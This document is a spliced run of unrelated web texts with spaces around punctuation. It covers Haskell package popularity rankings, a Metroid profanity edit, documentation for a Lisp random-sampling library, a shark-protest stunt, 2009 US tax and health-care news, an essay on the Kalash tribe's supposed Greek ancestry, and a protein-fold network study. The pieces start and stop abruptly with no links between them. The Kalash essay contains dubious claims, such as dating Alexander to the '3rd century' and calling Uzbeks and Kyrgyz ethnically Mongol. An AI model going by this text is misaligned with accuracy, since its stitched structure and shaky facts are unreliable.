haddock – A documentation - generation tool for Haskell libraries xmobar – A Minimalistic Text Based Status Bar yi – The Haskell - Scriptable Editor hscolour – Colourise Haskell code happy ( +1 ) – a parser generator for Haskell alex ( - 1 ) – a tool for generating lexical analysers in Haskell leksah ( +1 ) – Haskell IDE written in Haskell cpphs ( +3 ) – A liberalised re-implementation of the C pre-processor darcs – a distributed , interactive , smart revision control system frag – A 3 - D First Person Shooter Game pandoc – Conversion between markup formats uuagc – Attribute Grammar System of Universiteit Utrecht hmp3 –
An ncurses mp3 player c2hs – C -> Haskell FFI tool with cross-language type safety hoogle – Haskell API Search cabal - rpm – RPM package builder for Haskell Cabal source packages happs - tutorial – A Happstack Web 2.0 - type demo hlint – Source code suggestions for Haskell
Top 20 Haskell libraries
HTTP – Client - side HTTP zlib – Compression and decompression in the gzip and zlib formats Cabal – A framework for packaging Haskell software X11 – A binding to the X11 graphics library binary – Binary serialisation for Haskell values using lazy ByteStrings utf8 - string – Support for reading and writing UTF8 Strings mtl – Monad transformer library regex - posix – POSIX regular expressions xmonad - contrib ( +11 ) – Third party extensions for xmonad parsec ( +1 ) – Monadic parser combinators X11 - extras – ( obsolete ) Missing bindings to the X11 graphics library network – Networking - related facilities regex - base – Regular expressions for Haskell QuickCheck – Automatic testing of Haskell programs bytestring – Fast , packed , strict and lazy byte arrays HaXml – Utilities for manipulating XML documents hslogger – Versatile logging framework terminfo – Haskell bindings to the terminfo library time – A time library regex - compat – API compatible regular expressions
Essentially unchanged since March in overall rankings .
What if we look at the fastest rising packages though ?
These are the 25 packages that climbed the most in overall rankings in the 4 months to August 2009 , and by how many rankings they improved .
Top 5 fastest rising applications
MazesOfMonad 1266 – Console - based Role Playing Game bloxorz 1254 – OpenGL logic game HPong 1166 – A simple OpenGL Pong game based on GLFW darcs - beta 1131 – beta branch of darcs Bookshelf 1012 – A simple document organizer with some wiki functionality
Top 5 fastest rising libraries
hashed - storage 1208 – Hashed file storage support code atom 1200 – A DSL for embedded hard realtime applications buster 1197 – Almost but not quite entirely unlike FRP GUI library hack 1190 – a Haskell Webserver Interface elerea 1174 – A minimalistic FRP library
All these can be installed with :
$ cabal install < package >
Crunch the Numbers
Here ’s the data so you can see how your favourite packages are going :
You can also get the month by month totals :
And do n’t forget — the Haskell Platform is cutting into cabal - install ’s monopoly on distribution of Haskell code … downloads for that are counted separately .
QuickCheck – Automatic testing of Haskell programs
In Metroid Prime 3 : Corruption , Admiral Dane expresses his frustration with the Space Pirates by letting out a rather mild profanity .
" Damn , " to be precise .
In the Metroid Prime Trilogy , which released a week ago , it 's been scrubbed .
Advertisement
See for yourself in the above comparison , uploaded yesterday by YouTube user ThunderChaosStudios .
The cleanup did n't affect the rating process at all .
All three games in the trilogy were originally rated teen , and so is the trilogy .
One wonders why someone went to the trouble of eliminating the only ( ? ) swear word in the game , one you hear on television daily .
I 've contacted a Nintendo public relations rep for comment .
If we hear back , we 'll update the post here .
Advertisement
Metroid Prime : Corruptions Admiral Dane Drops the Curse Word [ GoNintendo via Joystiq ]
SimpSamp provides three categories of functions and macros .
Functions and macros for a wider variety of input and output types , optimized for each combination .
Faster , but less flexible .
Functions that can be used with a few different types of input sets .
The result of mutating a set while it is being iterated upon is undefined .
Whenever a parameter calls for a function , any function designator ( such as a symbol naming a function ) may be used .
Whenever a random sample is requested with a size larger than the input set , the requested size is limited to the size of the input set .
In this case , the resulting sample is the entire input set .
The order of elements within any random sample is not assured to be random , even though it may appear so at first glance with some functions and macros .
The only thing that is random is which selection is made of all the possible subsets of the input set that is of the requested size .
When a " random sample " is said to be taken , this is shorthand for a simple random sample without selection .
For other types of SET , FUNCTION is applied with one argument : the value of the current element .
When SET is a mapping type ( e.g. a hash table ) , FUNCTION is applied with two arguments : the key and the value of the current entry .
The function to call with each entry of the selected random sample .
The arguments given to FUNCTION vary with the type of SET .
Iterates over a random sample of a set .
For each iteration , FUNCTION is called with the current entry of the sample .
The result of each call to FUNCTION is discarded — results are not accumulated .
Other than the resulting sequence type , the parameters and semantics are identical to those of SAMPLE .
See : Section 3.2.1 , “ SAMPLE : Samples as Sequences ”
When SET is a mapping type ( e.g. a hash table ) , the returned elements will be CONS cells of the form ( KEY . VALUE ) .
SimpSamp offers a few generic functions , which are explained in this section .
These generic functions have methods which specialize on LIST , VECTOR , and HASH - TABLE .
EXHAUSTED ?-FN is always called before each call to NEXT - FN .
The first time that EXHAUSTED ?- FN returns true , NEXT - FN will not be called again .
NEXT -FN is a function of no arguments that returns the next element of the set , advancing through the set .
EXHAUSTED ?-FN is a function of no arguments that returns a generalized boolean indicating whether the end of the set has been reached .
NEXT - FN may produce multiple values .
Together , we refer to the sequence of values as an entry of the set .
Depending on the function or macro operating on the set , the values may be turned into a list to be used as the value of a single variable , multiple variables may be bound to the values , or a single variable may be bound only to the primary return value .
SIZE is the number of entries in the input set .
NEXT - FN is a function of no arguments that returns the next entry of the set , advancing through the set .
A Set Specification expresses an input set to take a sample of .
The Set Specification syntax depends on what kind of input is being operated upon .
Expresses the set to take the sample of .
Only hash tables are supported as input .
See : Section 3.3.6.1 , “ Set Specification ”
For each selected entry , only the primary value returned by the NEXT - FN function of the iterator is represented in the returned sequence .
In no case should [ ] it be more efficient to request a list than it would be to request the same thing as a vector .
For best performance , it is recommended that you use vectors unless your situation demands otherwise .
For each selected entry , all the values returned by the NEXT - FN function of the iterator are given to FUNCTION as corresponding arguments .
The function to call with each entry of the selected random sample .
The arguments given to FUNCTION vary with each MAP - SAMPLE - OF -* function :
Iterates over a random sample of a set .
For each iteration , FUNCTION is called with the current entry of the sample as one or more arguments .
The result of each call to FUNCTION is discarded — results are not accumulated .
A form to be evaluated when iteration ends .
The result of this form is used as the result of the DO - SAMPLE - OF -* macro .
If not given , there are no values in the result of the macro .
Useful in conjunction with EFFECTIVE -N- VAR to initialize any output data structures ( but this technique is mostly useful to other functions in SimpSamp that use the DO - SAMPLE - OF -* macros ) .
When EFFECTIVE-N-VAR is given , it is bound for the evaluation of INITIAL - FORM , RESULT - FORM , and BODY .
A symbol naming a variable to be bound with the effective number of entries of the selected sample .
( The result of N - FORM is limited by the actual size of the input set . )
The DO - SAMPLE - OF -* macros evaluate each element of the set specification as expressions to produce the corresponding value to use .
Evaluated to produce the size of the sample to take of the input set .
It is unspecified whether fresh bindings are made for each evaluation of BODY , or whether the same bindings are reused each time .
Either a list of symbols naming variables to be bound to each corresponding value returned by the iterator for each chosen entry , or a symbol naming a variable to be bound to a list of all the values returned by the iterator for each chosen entry .
Expresses which variables to bind to each entry of the selection for the evaluation of BODY .
The syntax varies with each macro .
All the macros establish an implicit block named NIL .
BODY may terminate the loop prematurely and specify the resulting values of the macro with RETURN .
These macros iterate over a random sample of a set .
For each iteration , one or more variables are bound to the current entry of the sample , and a given body of code is evaluated .
The following table lists the available functions and macros , listed according to the type of input they operate on ( row - wise ) and how they emit their output ( column - wise ) .
Most of the functions and macros provided by SimpSamp are specialized for their input and output types .
Each one is optimized for that combination of input and output type , and can only operate on the type of input set it was designed for .
3.4 . Low - Level Macros
The generic functions and specialized functions / macros in SimpSamp depend on two core algorithms , both implemented as macros .
The algorithms are implemented as macros because we want to stream the input of the algorithms , element by element , from other components , and ( in the case of selection sampling ) stream the output of the algorithms to other components .
This is unnecessarily slow ( on SBCL ) when done the functional way .
With macros , different parts can still be composed ( sample a vector → sample an integer range → sample an abstract iterator ) , and functional interfaces are provided that present a clean interface to the fast internal macro - based code .
I 've found that using macros to layer functionality gives me the same speed as a hand - written function that does exactly what I want .
During prototyping , using functional techniques slowed things down up to about 25 % .
This solution is n't the most elegant , but the speed matters for where I intended to use the library .
3.4.1 . DO - SAMPLE-OF-ITERATOR-EXPR
: Selection Sampling DO - SAMPLE-OF-ITERATOR-EXPR
Syntax .
( DO - SAMPLE-OF-ITERATOR-EXPR
( VARS N - FORM SIZE - FORM NEXT -FORM &key EFFECTIVE-N-VAR INITIAL -FORM RESULT-FORM ) &body BODY ) =>
( The result of RESULT - FORM , or no values if not given . )
This macro iterates over a random sample of a set given as an expression of its size and an expression which evaluates to the next entry of the set , advancing through the set .
For each iteration , one or more variables are bound to the current entry of the sample , and a given body of code is evaluated .
This macro is nearly identical in syntax and semantics to the DO - SAMPLE - OF - ITERATOR macro .
The key difference is that this macro takes the next entry of the input set by evaluating NEXT - FORM each time , whereas with DO - SAMPLE - OF - ITERATOR , NEXT - FN is evaluated once to produce a function which is called each time .
With this difference highlighted , the specification of this macro defers to : Section 3.3.2 , “ DO - SAMPLE -OF -* : The Iteration Macros ”
Alice Newstead took protesting to the next level when she pierced her skin with oversized fish hooks and hung from the ceiling of a Paris boutique in a campaign over shark extinction .
Alice Newstead , an artist from Watford , used the backdrop of Paris for her fishy protest , painting her body in silver to resemble a shark , before being hoisted into the air with oversized fishing hooks .
The painful stunt went on for 15 minutes , as shoppers came to have a gander at the weird protest in the window of cosmetics store Lush .
According to the International Fund for Animal Welfare ( IFAW ) some 100 million sharks are caught in commercial and sports fishing every year , and several species have declined by more than 80 per cent in the past decade alone .
NEW YORK ( CNNMoney.com ) --
Most people think they pay too much to Uncle Sam , but for some people it simply is not true .
In 2009 , roughly 47 % of households , or 71 million , will not owe any federal income tax , according to estimates by the nonpartisan Tax Policy Center .
Some in that group will even get additional money from the government because they qualify for refundable tax breaks .
The ranks of those whose major federal tax burdens net out at zero -- or less -- is on the rise .
The center 's original 2009 estimate was 38 % .
That was before enactment in February of the $ 787 billion economic recovery package , which included a host of new or expanded tax breaks .
The issue does n't get a lot of attention even as lawmakers debate how to pay for policy initiatives like health reform , whether to extend the Bush tax cuts and how to reduce the deficit .
The vast majority of households making up to $ 30,000 fall into the category , as do nearly half of all households making between $ 30,000 and $ 40,000 .
As you move up the income scale the percentages drop .
Nearly 22 % of those making between $ 50,000 and $ 75,000 end up with no federal income tax liability or negative liability as do 9 % of households with incomes between $ 75,000 and $ 100,000 .
Of course , income taxes do n't tell the whole story .
Workers are also subject to payroll taxes , which support Social Security and Medicare .
When considering federal income taxes in combination with payroll taxes , the percent of households with a net liability of zero or less is estimated to be 24 % this year , according to the Tax Policy Center 's estimates .
A key reason why there is a zero-liability group at all is because the U.S. tax system is progressive .
Those who bring in more money pay more than those lower down the income scale to support government functions such as national defense and social safety nets like Medicaid for those in need .
That progressivity can be dialed up or down .
" Some think it 's too progressive .
Some do n't think it 's progressive enough , " said Roberton Williams , a senior fellow at the center .
President Obama falls into the latter camp .
He has proposed increasing the income tax burden on families making more than $ 250,000 and individuals making more than $ 200,000 , while offering new measures to reduce the tax bite for most Americans making less .
One of Obama 's proposals is to extend the 2001 and 2003 Bush tax cuts for everyone except high - income tax filers , which was the group that derived the most benefit from those cuts .
As a result , under Obama 's budget , he would keep the ranks of the non-payers higher than they would otherwise be .
Why the tax - free matter
The question of who pays and who does n't is not a trivial matter .
But Washington policymakers are not dealing with it in an explicit way .
And that 's a problem , given the country 's fiscal outlook .
If asked to vote up or down on whether they are comfortable with such a large group of voters contributing no federal income tax or payroll tax revenue , the majority may well decide it is appropriate given the means of the households involved .
Or they may decide that it 's not .
Either way , that decision should inform the debate about the many costly policies and deficit - reduction strategies that lawmakers will be grappling with for years to come .
" As the number [ of nonpayers ] becomes larger , we have to question whether we 'll make good decisions about how to allocate resources , " economist George Zodrow , a professor at Rice University .
" Most people do n't understand how skewed the tax distribution is . "
Experts say that to pay for all the things on the country 's growing tab , the money can't just come from a shrunken pool of taxpayers .
" Over the long run , you 'll have to have a broader base , " Zodrow said .
WASHINGTON - Health care legislation taking shape in the House carries a price tag of at least $ 1 trillion over a decade , significantly higher than the target President Barack Obama has set , congressional officials said Friday as they struggled to finish work on the measure for a vote early next month .
Democrats have touted an unreleased Congressional Budget Office estimate of $ 871 billion in recent days , a total that numerous officials acknowledge understates the bill 's true cost by $ 150 billion or more .
That figure excludes several items designed to improve benefits for Medicare and Medicaid recipients and providers , as well as public health programs and more , they added .
The officials who disclosed the details did so on condition of anonymity , saying they were not authorized to discuss them publicly .
Some moderate Democrats have expressed reluctance to support a bill as high as $ 1 trillion .
Last month , Obama said in a nationally televised address before a joint session of Congress that he preferred a package with a price tag of around $ 900 billion .
Obama also said he would not sign a bill that raised deficits , and the CBO estimates the emerging House bill meets that objective .
Officials said the measure would reduce deficits by at least $ 50 billion over 10 years and perhaps as much as $ 120 billion .
Democrats also said the bill would slow the rate of growth of the giant Medicare program from 6.6 percent annually to 5.3 percent .
" The bill will be paid for over 10 years .
It will reduce costs but also will not add a dime to the deficit " in future years , House Speaker Nancy Pelosi , D - Calif . , said at a news conference .
Still , Obama 's speech provoked enough concern among House Democrats that senior presidential aides were called to a meeting in the Capitol to explain precisely what the president had in mind when he set the $ 900 billion target .
The figure of $ 871 billion " is a coverage number .
I think the White House has made that very clear .
It is a number about coverage , " Pelosi said recently when asked about the size of the measure .
Linda Douglass , a spokeswoman for the White House , said , " The speaker is working on a plan that meets with the president 's price tag of around $ 900 billion for health insurance reform and will not add a dime to the deficit . "
House Democrats took steps to fulfill another of Obama 's goals during the day , announcing their legislation would completely close a gap in Medicare prescription drug coverage within a decade , five years faster than originally contemplated .
In addition , Pelosi said , " as of Jan. 1 , 2010 , our legislation will give a 50 percent discount for brand - name drugs to recipients in the donut hole and it will reduce the size of the donut hole by $ 500 . "
After months of delay , Democrats in the House and Senate are aiming for votes next month on legislation to fulfill Obama 's goal of expanding coverage to millions who lack it , banning insurance industry practices such as denying coverage for pre-existing conditions and slowing the growth in health care spending nationally .
The House bill will also lift the insurance industry 's exemption from federal anti-trust laws , a provision under consideration in Senate negotiations as well .
With time growing short , Pelosi and Senate Majority Leader Harry Reid are struggling independently with the most controversial of all issues involved with health care , proposals for a government - run insurance option to compete with private industry .
In the House , Democrats have tentatively concluded they cannot win passage of the provisions favored by most liberals , one calling for a nationwide government - run plan with payments to doctors and hospitals linked to rates paid by Medicare .
It was unclear what fall - back plan was under consideration , but the internal disagreement cast doubt on plans to publicly unveil legislation early next week .
Across the Capitol , Reid , D - Nev. , assessed support for a nationwide government - run insurance option that would allow states to opt out of the system .
While the plan evidently enjoys a clear majority , it is uncertain whether it can command the 60 votes needed to overcome a threatened Republican filibuster .
Democrats hold 60 votes in the Senate , but one , Sen. Ben Nelson , D - Neb. , has spoken out strongly against a so - called public option .
A few other members of the rank and file have been non-committal .
One , Sen. Mary Landrieu , D - La. , met with Reid during the day and later issued a statement saying she was encouraged that a compromise might be possible .
She also added pointedly that she had told Reid about " the unique challenges Louisiana is facing in terms of Medicaid and the special concerns I have about teaching hospitals , " a possible signal that easing home - state concerns could influence her vote on the larger , national question of a government - run insurance option .
Also opposed is Sen. Olympia Snowe of Maine , the only Republican this year who has voted for a Democratic - drafted health care bill in committee .
As an alternative , she favors allowing the government to step in only if there is insufficient competition in the private insurance industry .
Nor was it clear whether Democrats would be able to enlist additional Republicans .
Sen. George Voinovich , R - Ohio , frequently mentioned by Democrats as a potential convert , said in an interview , " We can't afford the health care system that we have right now .
And if we can't afford the one we have right now , how are we going to afford another one that 's going to cost more money . "
For Reid , the question of a government - run option is one of a many thorny issues to be settled before he can bring health care legislation to the Senate floor .
He and senior committee chairmen have been meeting with top White House aides in recent days to produce a bill , and hopes of largely wrapping up the work by the end of the week went unfulfilled .
-----
Associated Press writers Chuck Babington , Laurie Kellman and Erica Werner contributed to this story .
Alexander the Great 's long - lost descendants in
Pakistan ? , and the " whites " of Central Asia
Of the many distinct tribes and ethnic groups around the world , especially in remote regions divorced from the dominance of influential civilizations , many devise romantic ancestry in order to distinguish themselves from the hegemony of others .
Some African peoples consider themselves descendants of the Lost Tribes of Israel , like the Ethiopians .
In the remote and desolate mountains of eastern Central Asia , the inhospitable topography has especially allowed distinct populations to retain their ancient traditions , either imported or constructed .
This advantage has been embraced by many ancient religious minorities seeking solace from persecution by Muslims or other expanding religions , as well as by the Mujahidin of today who have still eluded the might of the US military .
The Hindu Kush and Pamir mountains straddling Pakistan , Kashmir , eastern Afghanistan , and Tajikistan have recently revealed hugely diverse and unique cultures that were able to escape the staunch and exclusionary Islamic tradition .
The Kalash tribe has recently stood out for their unique genetic features , vibrant dress , rituals , and religion , all on the brink of extinction because of their polytheistic religion in one of the Sunni world 's most conservative regions .
Are they Alexander the Great 's long - lost Greek descendants ?
Background on the demographics and genetics of eastern Central Asia
Understanding the genetics of the region can help determine whether or not the Kalash 's Greek roots are reality .
All across the Pamir mountain range and the Hindu Kush  from the eastern fringe of Uzbekistan and Tajikistan to western China and Kyrgyzstan  there is an unusual amount of ethnic and genetic diversity that can easily shock the average person who envisions the Muslim world with the dark - hair and bearded , dark - eyed , olive - skinned features associated with Semitic Arabs .
Many populations have blue or green eyes , are often taller or even with red hair .
Red -haired , blue - eyed monks brought Buddhism from Afghanistan to China , at least if Chinese depictions of the Tocharians is accurate .
There is also an unusually high percentage of deformities not common in the general local populations such as crossed eyes , etc. , possibly a result of occasional inbreeding that naturally appears in such remote and small populations .
The ethnic or racial group to which the Tajiks belong is the Iranian group common to Iran and most of Afghanistan ( especially the Pashtuns ) .
The Uzbeks and Kyrgyz are ethnically Mongol , descendants of Mongolian settlers who conquered the region under Chinggis Khan , but have since embraced Turkic culture and their religion ( Sunni Islam ) and language .
The western portions of China ( East Turkestan ) , the Muslim Uyghurs , include both Mongol and Turkic populations under the same historic Uyghur cultural orbit .
All of Central Asia is Sunni Muslim ( Hanafi school ) , excluding the Orthodox and secular Russian Soviet settlers who dominate the already - poor economies here .
The majority of the population of Pakistan and Kashmir fall into the Indo - Aryan racial / genetic group , and are related to the North Indians , all with ancient linguistic relation to the Iranians .
Despite these dominant populations , disparate populations still are markedly different from the Iranian , Indic , and Mongol elements .
It is important to note that Turks and Iranians , both of whom are often described as  Arab - like in the West , are typically light - skinned , tall and slender , often even described as  Europoid ( related to Europeans ) , and often have green or blue eyes and lighter hair , especially among Turks .
The green eyes of the supposedly Greek Kalash tribe , their most striking feature , is difficult considering its frequency among Turks and Iranians and rarity among Greeks even in Greece .
A map of Central Asia .
Notice the proximity of northeastern Afghanistan , Pakistan , and Tajikistan .
The far north of Pakistan is the Hindu Kush , the Pamir mountains including Tajikistan and its surroundings , and the dotted - line circle in northern India on the right is Muslim Kashmir .
There are " white " or " European - looking " populations all over this region , although Iranians and Turks who populate southern Central Asia , typically called " white " also , have the same light features frequently .
The Hindu Kush mountain states in northwestern Pakistan ( Chitral and Nuristan ) are where these kafirs ( infidels ) reside .
Historical background on ethnic Greek expansion into Central Asia and Afghanistan
From the 7th century until the 4th BCE , the ancient Iranian nation of the Achaemenid dynasty had conquered the most massive empire the world had ever seen before .
Stretching from Afghanistan and the Hindu Kush to even forever terminate Ancient Egypt , and threatening the very existence of the Greek squabbling city - states , this Iranian empire also exerted its cultural and political dominance all the way to China and Kazakhstan .
Under the Persian god-kings , they followed the Zoroastrian or Mazdaist religion with the intense dualism of heaven and hell that the Jews under Persian rule eventually added into the later Western religions derived from the Bible .
This religious concept is present among all of the peoples influenced by Iranian cultural or ethnic domination , including the Kalash .
In the 3rd century , in the northern Greek city - state of Macedonia in what is now Greece came the young general Alexander , son of Philip of Macedon , who by the end of his life had conquered all of Egypt , northern Arabia , the Greek tribes , and the entire Iranian empire .
His defeat of the Persians gave the Greek culture domination over the empire that the Persians had already conquered before ( he did not conquer much of the land himself ) .
Alexander had the unique policy of ensuring stability of forging alliances with local peoples that he borrowed from the Iranian satrap system .
He also had the strategy of intermarrying his generals with local rulers in order to secure their submission , although this was very unpopular with the Greek army and had more to do with stability than any modern form of tolerance .
As a result of both of these tactics , Greek culture flourished in parts of Iran , Central Asia , Afghanistan , and the Hindu Kush .
Alexander 's domination of the region as well as the acceptance of local leaders led to the settlement of large Greek populations , especially around Balkh in modern Afghanistan .
Many ancient coins of local rulers included Greek - alphabet inscriptions , and there is evidence of the propagation of Greek philosophical ideas eastward .
Very little of the Greek religion spread here because of the high development of the native religions that were far older than the Greek religion , although Iranian - origin gods have permeated into Greek and later Roman religion , like ( possibly ) the Mithra cult that derives from Zoroastrianism .
The Greek conquest had a noticeable cultural and political legacy in the region for centuries after Alexander 's death .
And thus , many ethnic Greeks stayed behind , and perhaps the Kalash .
As soon as he died , the empire immediately collapsed into squabbling Greek kingdoms .
But the legacy endured .
A native empire around Afghanistan , Tajikistan , and the Hindu Kush had already grown prior to Greek conquest , and had become one of the earliest and most glorious Buddhist civilizations .
This Buddhist Kushan empire , following Greek conquest , later assumed a Greek cultural and demographic element that was evident on Kushan coins and Greek - language writings that survived long after the Alexandrian empire 's collapse .
The Buddhas of Bamiyan that were detonated by the Mujahidin of the Taliban were a testament to the glory of this Greek - influenced state .
It is sometimes argued that the transformation of the Buddha figure into a slender human figure ( in contrast with the Eastern fat Buddhas ) has Greek settlers to thank since they imported the tradition of Greek sculpting eastward .
Many Greeks converted to Buddhism , or created syncretic religions with Buddhist and Greek religious elements upon settlement .
The Kalash tribe may be one of these descendants .
Another religion that escaped Iranian and later Muslim persecution by hiding in Central Asia and the Hindu Kush was Manicheism .
This Iranian religion , derived from Zoroastrianism in part , emphasized the dualistic nature of the universe between evil and good that may have influenced the Kalash tribe today in their nature worship and dualistic gods .
This crossroads of religions and cultures surely had as much an effect on the Greek settlers that it did on the natives .
With the re-emergence of the even more powerful Iranian empires and the Huns , this civilization and its Greek traditions were abolished and extinguished , and with the Muslim conquest , most of their polytheistic religions with it .
Interestingly , the Kalash claim that they were once educated and highly literate before their books  were burnt by barbarians .
This parallels the destruction of this famous Buddhist center of culture that was the Kushan state that was destroyed by the Hunnish barbarians ( among others ) .
The possibly Greek Kalash , left behind in these remote regions to be spared from the conquests of mighty empires , may be the last remnants of this ancient Greek Alexandrian tradition .
Alexander the Great 's empire .
Nearly all of it was simply what he got from the Iranians who he destroyed at Gaugamela .
Notice the extension of his ( and Iranians ' ) power into Pakistan , India , and Afghanistan .
The Buddhas of Kushan in Bamiyan , Afghanistan .
Destroyed by the Mujahidin .
The  Greek Kalash tribe , their customs and religion , and possible ethnic classification
The word Kalash means wearers of black , although they wear a huge array of bright and dark colors , especially for festivals .
There is common use of cowrie shells on dresses of women , a trait common among ancient or primitive peoples as an expression of wealth .
They are the only pagans ( polytheists  many gods ) in Pakistan and the surrounding Hindu Kush , since the Buddhists , Manichaeans , Jewish Khazar merchants , and Hindus had long been expelled , slaughtered , or converted by over a millennium of Muslim rule .
The region in the North West Frontier of Pakistan ( in the Kush ) is often called kafiristan by scholars and locals ( kafir is the Muslim term for infidel ) .
They have unique rituals of their own , such as winemaking ( of course , forbidden or haraam in Islam ) and shoemaking .
They have a strange ritual of sending teenage boys into the difficult forest terrain for nearly a year and , if they survive , they can have their way with any number of women .
Obviously , this is far from a Muslim ritual , but it surely is not notably Greek either .
There is little gender segregation unlike their Muslim neighbors , who eat , sleep , pray , and work separately .
They have intense funeral and mourning rites in which women dance in circles , sacrifice goats and cattle , feast , and drink .
They apparently seldom eat meat because of the expense of livestock in this wickedly poor and desolate region .
Alcohol is important in ritual , as it was in Greek and pre-Islamic Iranian culture .
They apparently reject eating or slaughtering chickens , even claiming that introducing chickens into Kalash society would spell their extinction , and Muslims have done just that ( source : Maureen Lines ) .
The women wear headdresses , scarves , and veils , and the men often wear headcoverings , kufis ( Islamic skullcaps ) , and Islamic - derived garb .
Women remove their headscarves when in mourning , likely to signify emptiness and absence .
It seems that , divorced from the hegemony of any other local civilization and equally divorced from their Greek heritage ( if indeed they are Greek ) , they are now in all respects their own .
Today numbering less than 4,000 by some estimates ( source : Maureen Lines ) , deforestation , over development , Islamic terrorism , high mortality , and conversion make many think this society is close to extinction , and the strictly Islamic qualities of Pakistan ( especially the North West Frontier ) that make their traditions stifle their survival in trade and life .
The danger that results from being a polytheist in a Muslim land probably means that there are far more Kalash who have either forgotten or abandoned their roots either with conversion or for the sake of their own lives .
Classifying the Kalash is difficult because of the region 's legacy of demography exchange and cultural hegemony .
Mixing , although uncommon because of the antagonism between the new invaders , and the topography of the region , further complicates defining these people as ethnic Greeks .
Their blue and green eyes may simply be a result of rare and isolated recessive genes , although they surely came from an ethnic / racial group 's common stock .
Light eyes , somewhat common among Turks and Iranians but seldom among Greeks , are not enough to define them as Greeks or Europeans .
The vast majority of Greeks ( even in Greece ) tend to have very dark hair , brown or hazel eyes , and olive skin , although green eyes are sometimes present .
It is difficult to describe them as being Greek when their genetic features are uncommon in Greece but more common in the local region among Turks , Pamirians , Slavs , and Iranians .
Even many Slavic Bulgarians ( despite typically dark features ) claim descent from this difficult - to - classify cultural orbit with light features in the Pamir mountain range .
Many Bulgarians believe that the strange light - eyed and - haired tribes throughout southern Russia and Central Asia are the true ancient Bulgars or Bulgarians before they mixed with Iranian Thracians in modern Bulgaria to form their own branch ( if this ever even happened ) .
None of this is or can be proven , and thus the difficulty in classifying any of these whites  or European peoples in Asia ( or the Kalash ) is difficult .
It is just as possible to say that the Kalash are Slavic .
Although this tribe or ethnicity populate only the Hindu Kush and the North West Frontier , their unique qualities are a microcosm seen all over the Pamir and Kush basin .
Many local tribes with minute dialectical difference , like in Luristan and eastern Afghanistan , have similar features and possible links with the Kalash , and thus possibly with the Macedonians ( Greeks , not modern Slavs of the ex-Yugoslav Macedonia ) .
The language and customs of the Kalash derive from local influence .
Their languages include Urdu ( Pakistani ) , Pashtun , Farsi , and their own dialects of the Indo - Iranian language group to which most of Pakistan and North India belong .
Greek is not spoken , and very little of their dialects seem to have Greek influence , but this of course does not dissolve their possible Greek roots .
Their dress and customs , with their very vibrant and bright clothing for festivals , seems to be their own creation in their effort to distinguish themselves from the hegemony of Islam and the dominant local cultures .
Many claiming Kalash ancestry have predictably converted to Sunni Islam .
For this , they are shunned from this society for deteriorating the already - dwindling Kalasha identity .
It is difficult to put credence in the Kalash 's claims of Greek and Alexandrian ancestry from the linguistic , cultural , or visual ethnic perspectives .
Their claims to this descent may be just as fabricated as African - Americans ' constructed links with Swahili language or Islam that almost none of their ancestors spoke or followed , or the old German claim that Mycenaean Greece and Rome were created by roving Germanic warriors .
More than a dozen cities named after Alexander were founded after his name , such as Alexandria or Iskanderiya .
Societies facing extermination or death , or seeking to find glorious and esoteric qualities tend to invent mythology about themselves .
Perhaps their descent from Alexander the Great and his army  [ of Greeks ] originally referred to soldiers conscripted in Alexander 's campaign after his conquests in Iran , irregardless of their race .
What may be a useful tool in determining the Greek ancestry of the Kalash is their religion .
However , the location of the Kalash dictates that it could have been imported from other local cultures or merged to form a distinct Kalash tradition that has nothing to do with Greeks .
There is firstly a great emphasis on dualism ( light / good and darkness / evil ) that is surely influenced by the Buddhist , Manichean , and Zoroastrian heritage of the region stretching from Tajikistan to Kashmir .
The Kalash apparently divide their worldview into a system of male and female realms , and gendered aspects of reality and life ruled over by gods and goddesses .
This springs from the fertility cult concept popular in nearly every early society and today 's primitive societies free from modernizing civilizations .
The Kalash worship nature , animals , and spirits .
None of these religious qualities seem to derive from Greek religion .
No Zeus , Hera , Apollo , or Athena .
No titans and fire - to - Man myths .
The modern religious mysticism of the Kalash may simply be a blend of the Greco - Kushan Buddhist tradition and Zoroastrian / Manichean dualism that evolved into its own new form after the Jihad of Islam abolished Buddhism and destroyed nearly all images and statues of the Buddha they could find .
There is much influence from the more core tenets of Hinduism or its Aryan / Iranian - created Vedic predecessor that came to India in the 2nd millennium BCE via the Aryan invasion .
Belief in Indra and emphasis on the bull / cow are present , revealing links with Iranian and Vedic tradition .
There was little historic domination of this far northwestern region by Hindu powers in history , and thus this rules out the possibility that the Kalash people or their religion spring from Indian influence .
The Kalash emphasis on fertility rites , nature , statues , and gendered gods of different aspects of life is common to all of the early so - called  Indo - European religions  as well as the Vedic Aryans of Iran and North India .
Mark Cavendish says the fact more people get caught doping in cycling is a reflection on how effective the sport 's anti-doping procedures are .
Life requires lots of chemicals , from the DNA and RNA that carry genetic information to the lipids that keep the contents of cells separated from their environment .
But it 's fair to say a lot of the action involves proteins , which do everything from catalyzing chemical reactions to providing structural scaffolding for various parts of the cell .
All these different functions are dependent upon how the protein is organized in three dimensions , which occurs through a process called protein folding .
All the dizzying variety of known proteins are generated by linking together a chain composed of 20 common amino acids ( and a few rare variations on those ) .
When you consider how quickly the number of possible combinations of these amino acids increases as the length of the protein does , however , it should be clear that the proteins that exist occupy only a small portion of the potential protein space .
So , in this view , evolution has generated the rare , useful solutions within a sea of possibilities .
But that 's not the only way to look at things .
The alternative view is that the backbone that links together the amino acids in a limited number of well defined structures , such as spirals called ?- helixes and flat ribbons called ?- sheets , and there are a relatively limited number of ways to link up these features into a structural feature that biologists call a fold .
A new analysis of protein folds has now suggested that almost every existing fold fits into a network where it 's possible to link any protein fold with any other through a series of seven or fewer steps , each of which goes through another , existing protein fold .
The basic idea behind the paper is to use databases that contain the three - dimensional coordinates of all the atoms in every protein for which we know the structure .
Using this data , researchers have identified a large collection of folds , which the authors define as " a particular spatial arrangement of ?- helical and / or ?- sheet secondary structures . "
That 's where the new paper ( and a hefty dose of computing power ) comes in .
The authors went through and compared every known fold with every other one in a pairwise fashion , calculating the degree to which the folds are related , using a measure called the " TM - score . "
( This paper seems to have more details on the alignment . )
Because TM - scores have a known measure of statistical significance — the best alignment of two random proteins is 0.3 , with a standard deviation of 0.01 — the authors required a score of 0.4 before they 'd consider two folds to be related .
They then performed network analysis to create clusters of related folds .
The surprise was that they got what 's in essence a single , densely - packed cluster .
Over 80 percent of the total fold - space was within four hops ( where each hop brings you to another related fold ) from the rest of the cluster .
If you extend out to eight hops , you can incorporate over 98 percent of the known protein folds .
This densely packed graph remained even after the authors had eliminated all the proteins that were known to be related via evolution .
The authors argue that there 's simply a limited number of ways to pack together a hydrogen bonded structure , and nature has explored more or less all of them .
They support this argument by showing that they can see a similar network when they feed their system a set of structures generated from random , hydrogen - bonded peptides .
